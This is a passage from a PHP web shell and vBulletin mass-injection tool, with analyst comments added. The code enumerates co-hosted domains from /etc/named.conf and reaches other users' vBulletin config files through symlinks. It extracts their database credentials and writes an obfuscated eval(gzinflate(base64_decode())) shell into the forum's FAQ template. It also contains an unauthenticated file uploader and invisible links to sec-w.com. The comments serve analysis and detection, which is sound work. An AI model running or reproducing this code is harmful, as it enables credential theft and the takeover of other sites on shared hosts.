  1134. $es   = explode("||",$exp);
  1135.  
  1136. $config = $es[0];
  1137.  
  1138. $domin = $es[1];
  1139.  
  1140. $domins = trim($domin).'';
  1141.  
  1142. $readconfig  = @file_get_contents(trim($config));
  1143.  
  1144. if(ereg('vBulletin',$readconfig)){
  1145.  
  1146.  
  1147.  
  1148. $db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
  1149.  
  1150. $userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
  1151.  
  1152. $pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
  1153.  
  1154. $con     = @mysql_connect('localhost',$userdb,$pass);
  1155.  
  1156. $db      = @mysql_select_db($db,$con);
  1157.  
  1158. $shell   = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheu​MdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;
  1159.  
  1160. $crypt  = "{\${eval(gzinflate(base64_decode(\'";
  1161.  
  1162. $crypt .= "$shell";
  1163.  
  1164. $crypt .= "\')))}}{\${exit()}}</textarea>";
  1165.  
  1166. $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
  1167.  
  1168. $query  = @mysql_query($sqlfaq,$con);
  1169.  
  1170.  
  1171.  
  1172. if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
  1173.  
  1174. else
  1175.  
  1176. {
  1177.  
  1178. $r = '<b style="color:red">failed</b>';
  1179.  
  1180. }
  1181.  
  1182. $domins = trim($domin).'';
  1183.  
  1184. echo "<tr>
  1185. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1186. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  1187.  
  1188.  
  1189.  
  1190.  
  1191.  
  1192.  
  1193.  
  1194. }else{
  1195.  
  1196. echo "<tr>
  1197. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1198. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  1199. }
  1200.  
  1201. }
  1202.  
  1203.  
  1204.  
  1205.  
  1206.  
  1207.  
  1208.  
  1209.  
  1210.  
  1211.  
  1212. die();
  1213.  
  1214. }
  1215.  
  1216. if(!is_file('named.txt')){
  1217.  
  1218. $d00m = file("/etc/named.conf");
  1219.  
  1220. }else{
  1221.  
  1222. $d00m = file("named.txt");
  1223.  
  1224.  
  1225. }
  1226. if(!$d00m)
  1227. {
  1228.  
  1229.                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1230. }
  1231. else
  1232.  
  1233. {
  1234. echo "<div class='tmp'>
  1235. <form method='POST' action='$pg?sws=vb'>
  1236. <input type='submit' value='Inject shell' />
  1237. <input type='hidden' value='1' name='s' />
  1238. </form>
  1239. <br /><br />
  1240. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1241.  
  1242. $f = fopen('vb.txt','w');
  1243.  
  1244. foreach($d00m as $dom){
  1245.  
  1246. if(eregi("zone",$dom)){
  1247.  
  1248. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1249.  
  1250. if(strlen(trim($domsws[1][0])) > 2){
  1251.  
  1252. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1253.  
  1254. ///////////////////////////////////////////////////////////////////////////////////
  1255.  
  1256. $wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
  1257. $wpp=get_headers($wpl);
  1258. $wp=$wpp[0];
  1259.  
  1260. $wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
  1261. $wpp2=get_headers($wp2);
  1262. $wp12=$wpp2[0];
  1263.  
  1264. $wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
  1265. $wpp3=get_headers($wp3);
  1266. $wp13=$wpp3[0];
  1267.  
  1268.  
  1269. ////////// vb ////////////
  1270.  
  1271. $pos = strpos($wp, "200");
  1272. $config="&nbsp;";
  1273.  
  1274. if (strpos($wp, "200") == true )
  1275. {
  1276. $config= $wpl;
  1277. }
  1278. elseif (strpos($wp12, "200") == true)
  1279. {
  1280.  $config= $wp2;
  1281. }
  1282. elseif (strpos($wp13, "200") == true)
  1283. {
  1284.  $config= $wp3;
  1285. }
  1286. else
  1287. {
  1288. continue;
  1289.  
  1290. }
  1291. flush();
  1292.  
  1293. /////////////////////////////////////////////////////////////////////////////////////
  1294.  
  1295. $dom = $domsws[1][0];
  1296.  
  1297. $w = fwrite($f,"$config||$dom \n");
  1298. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1299.  
  1300.  
  1301. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1302. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1303.  
  1304.  
  1305.  
  1306.  
  1307.  
  1308. flush();
  1309.  
  1310.  
  1311. }
  1312. }
  1313. }
  1314. }
  1315.  
  1316.  
  1317.  
  1318.  
  1319.  
  1320.  
  1321.  
  1322.  
  1323. break;
  1324.  
  // 'help' action: renders a table of environment checks for the host this script runs on.
  // It only reads settings and probes paths; nothing in this case writes or changes state.
  // Presumably selected through the sws query parameter seen in the ?sws=read / ?sws=vb URLs earlier
  // in the file (the switch header is outside this excerpt, so confirm).
  // Analyst note: each row prints "True" in green when the condition suits the tool, so the labels
  // do not map one-to-one onto the underlying setting (see the per-row comments).
  1325. case 'help':
  1326.  
  1327. echo "<div class='tmp'>
  1328. <table align='center' width='40%'><td>function</td><td>Case</td>";
  1329.  
  1330.  
  // Row 1: reads the safe_mode ini value; "True" is shown when safe_mode is NOT enabled.
  1331. $safe_mode = ini_get('safe_mode');
  1332.     if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1333.  
  1334. echo "<tr><td>Safe Mode</td><td>$r</td>";
  1335.  
  // Rows 2-5: function_exists() for symlink, file, file_get_contents and mkdir.
  // Hardening note: a function listed in disable_functions makes function_exists() return false,
  // so a host that disables symlink shows "False" in the first of these rows.
  1336. $fun = function_exists('symlink');
  1337.     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1338.  
  1339. echo "<tr><td>function symlink</td><td>$r</td>";
  1340.  
  1341.  
  1342. $fun = function_exists('file');
  1343.     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1344.  
  1345. echo "<tr><td>function file</td><td>$r</td>";
  1346.  
  1347. $fun = function_exists('file_get_contents');
  1348.     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1349.  
  1350. echo "<tr><td>function file_get_contents</td><td>$r</td>";
  1351.  
  1352. $fun = function_exists('mkdir');
  1353.     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1354.  
  1355. echo "<tr><td>function mkdir</td><td>$r</td>";
  1356.  
  1357.  
  // Row 6: is_dir() on the relative path sym/root. The row is labelled "Permission denied" but
  // shows "True" when sym/root resolves to a directory (is_dir() follows symbolic links).
  1358. $fun = is_dir('sym/root');
  1359.     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1360.  
  1361. echo "<tr><td>Permission denied</td><td>$r</td>";
  1362.  
  1363.  
  // Row 7: the second argument to preg_match() is the boolean result of (X or !X), not the
  // content that was read, so the pattern is matched against a boolean rather than page text.
  // This row is therefore not a reliable indicator of an actual "Forbidden" response.
  1364. $fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
  1365.     if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
  1366.  
  1367. echo "<tr><td>Forbidden</td><td>$r</td>";
  1368.  
  1369.  
  1370.  
  1371.  
  1372. echo "</table></div>";
  1373.  
  1374.  
  1375.  
  1376. break;
  // Fallback for an unrecognised action value: redirect to $pg (assigned outside this excerpt).
  // NOTE(review): the page has already sent HTML before this switch runs (the doctype and markup
  // follow the first PHP block), so header() probably cannot take effect unless output buffering
  // is enabled — confirm. error_reporting(0) at the top of the file would hide the warning.
  1377. default:
  1378. header("Location: $pg");
  1379.  
  1380.  
  1381.  
  1382.  
  1383. }
  1384.  
  1385.  
  1386. /// home ///
  1387. }else
  1388. {
  1389.  
  1390.  
  // Default view (the matching if-condition is outside this excerpt): upload form plus handler.
  // The form posts multipart data back to the same URL (empty action attribute).
  1391. echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1392. echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  // Handler: when _upl equals "Upload", the uploaded temp file is copied to the client-supplied
  // file name relative to the current working directory. No authentication, extension, content-type
  // or size check is visible in this block, and '@' suppresses any copy() error.
  // Detection note: a multipart POST carrying _upl=Upload and a part named "file", followed by a
  // new file appearing next to the script, is the observable behaviour of this handler.
  1393. if( $_POST['_upl'] == "Upload" ) {
  1394.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
  1395.     else { echo '<br /><br />Not uploaded !!<br><br>'; }
  1396.  
  1397.  
  1398. }
  1399.  
  // Static credit footer. These literal strings do not vary per request, which makes them
  // usable as content signatures when scanning web roots for copies of this file.
  1400.    echo '
  1401. <br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
  1402. <br /><br />
  1403. <b style="color: red";>   Sec-w.Com  </b>
  1404. <br /><br />
  1405. Muslims Hackers</div> ';
  1406.  
  1407. }
  1408.  
  1409.  
  /**
   * Extracts a substring of $text delimited by $a and $b.
   *
   * Splits $text on $a, takes the piece after the first $a (which ends at the next $a, if any),
   * then splits that piece on $b and returns what precedes the first $b.
   *
   * NOTE(review): when $a does not occur in $text, $explode[1] is not set; the resulting
   * diagnostic is hidden by error_reporting(0) at the top of the file. No call site is visible
   * in this excerpt, so what input is passed in cannot be confirmed from here.
   */
  1410. function ex($text,$a,$b){
  1411. $explode = explode($a,$text);
  1412. $explode = explode($b,$explode[1]);
  1413. return $explode[0];
  1414. }
  1415.  
  1416.  
  1417.  
  // Closes the page markup. The two anchors use color #F4F4F4, the same value as the body
  // background-color in the page's stylesheet, so the links to sec-w.com/cc are not visible when
  // rendered. Their title and link text are mis-encoded in this copy of the file.
  // Detection note: the anchor markup (including the unusual "/href=" attribute spelling) is
  // static and can serve as a content signature for this file.
  1418. echo '</div>
  1419.  
  1420. <a style="text-decoration: none; color: #F4F4F4;" title="?§?„?­?…?§???‡"/href="http://sec-w.com/cc">?§?„?­?…?§???‡</a>
  1421.  
  1422. <a style="text-decoration: none; color: #F4F4F4;" title="???§?„?… ?§?„?­?…?§???‡"/href="http://sec-w.com/cc">???§?„?… ?§?„?­?…?§???‡</a>
  1423.  
  1424.  
  1425.  
  1426. </body>
  1427.  
  1428. </html>
  1429. ';
  1430.  
  1431. ?>
